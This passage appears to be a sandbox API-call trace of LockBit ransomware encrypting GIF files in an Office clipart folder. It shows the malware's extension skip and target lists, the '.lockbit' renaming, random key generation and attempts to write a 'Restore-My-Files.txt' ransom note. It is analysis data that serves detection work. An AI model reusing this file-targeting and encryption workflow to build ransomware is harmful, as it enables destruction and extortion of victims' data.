lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.712] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.712] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF.lockbit") returned 85 [0182.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143745.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0182.714] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.714] malloc (_Size=0x40068) returned 0x3df0008 [0182.714] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=733) returned 1 [0182.714] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.715] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0182.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.717] malloc (_Size=0xc0) returned 0x1fa2ed8 [0182.717] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0182.718] free (_Block=0x1fa2ed8) [0182.718] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143745.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0182.718] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0182.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.718] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a08600, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77a08600, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x595, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143746.GIF", cAlternateFileName="")) returned 1 [0182.718] lstrcmpiW (lpString1=".", lpString2="J0143746.GIF") returned -1 [0182.718] lstrcmpiW (lpString1="..", lpString2="J0143746.GIF") returned -1 [0182.718] PathFindExtensionW (pszPath="J0143746.GIF") returned=".GIF" [0182.718] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.718] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.719] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.719] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.720] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143746.GIF") returned 1 [0182.720] lstrcmpiW (lpString1="ntldr", lpString2="J0143746.GIF") returned 1 [0182.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143746.GIF") returned 1 [0182.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143746.GIF") returned -1 [0182.720] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143746.GIF") returned -1 [0182.720] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143746.GIF") returned 1 [0182.720] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143746.GIF") returned -1 [0182.720] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0182.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned=".GIF" [0182.720] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.720] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.720] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.720] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.720] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.720] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.721] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.721] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.721] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.lockbit") returned 85 [0182.721] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143746.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0182.722] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.722] malloc (_Size=0x40068) returned 0x1ff1e60 [0182.722] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1429) returned 1 [0182.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0182.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0182.723] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0182.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0182.727] malloc (_Size=0xc0) returned 0x1fa2ed8 [0182.727] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0182.728] free (_Block=0x1fa2ed8) [0182.728] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0182.728] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0182.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0182.728] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4cbfb00, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4cbfb00, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x11d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143748.GIF", cAlternateFileName="")) returned 1 [0182.728] lstrcmpiW (lpString1=".", lpString2="J0143748.GIF") returned -1 [0182.728] lstrcmpiW (lpString1="..", lpString2="J0143748.GIF") returned -1 [0182.728] PathFindExtensionW (pszPath="J0143748.GIF") returned=".GIF" [0182.728] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0182.728] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0182.729] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0182.729] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0182.730] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0182.730] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0182.730] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0182.730] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0182.730] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143748.GIF") returned 1 [0182.730] lstrcmpiW (lpString1="ntldr", lpString2="J0143748.GIF") returned 1 [0182.730] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143748.GIF") returned 1 [0182.730] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143748.GIF") returned -1 [0182.730] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143748.GIF") returned -1 [0182.730] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143748.GIF") returned 1 [0182.731] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143748.GIF") returned -1 [0182.731] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0182.731] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF") returned=".GIF" [0182.731] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0182.731] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0182.731] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0182.731] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.lockbit") returned 85 [0182.731] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143748.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0182.737] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0182.737] malloc (_Size=0x40068) returned 0x3df0008 [0182.737] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4561) returned 1 [0182.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0182.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0182.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0182.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0182.738] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0183.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.611] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.611] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0183.611] free (_Block=0x1fa2ed8) [0183.612] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143748.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.612] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.612] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.612] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ef75300, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9ef75300, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x1323, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143749.GIF", cAlternateFileName="")) returned 1 [0183.612] lstrcmpiW (lpString1=".", lpString2="J0143749.GIF") returned -1 [0183.612] lstrcmpiW (lpString1="..", lpString2="J0143749.GIF") returned -1 [0183.612] PathFindExtensionW (pszPath="J0143749.GIF") returned=".GIF" [0183.612] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.612] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.612] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.613] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.613] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 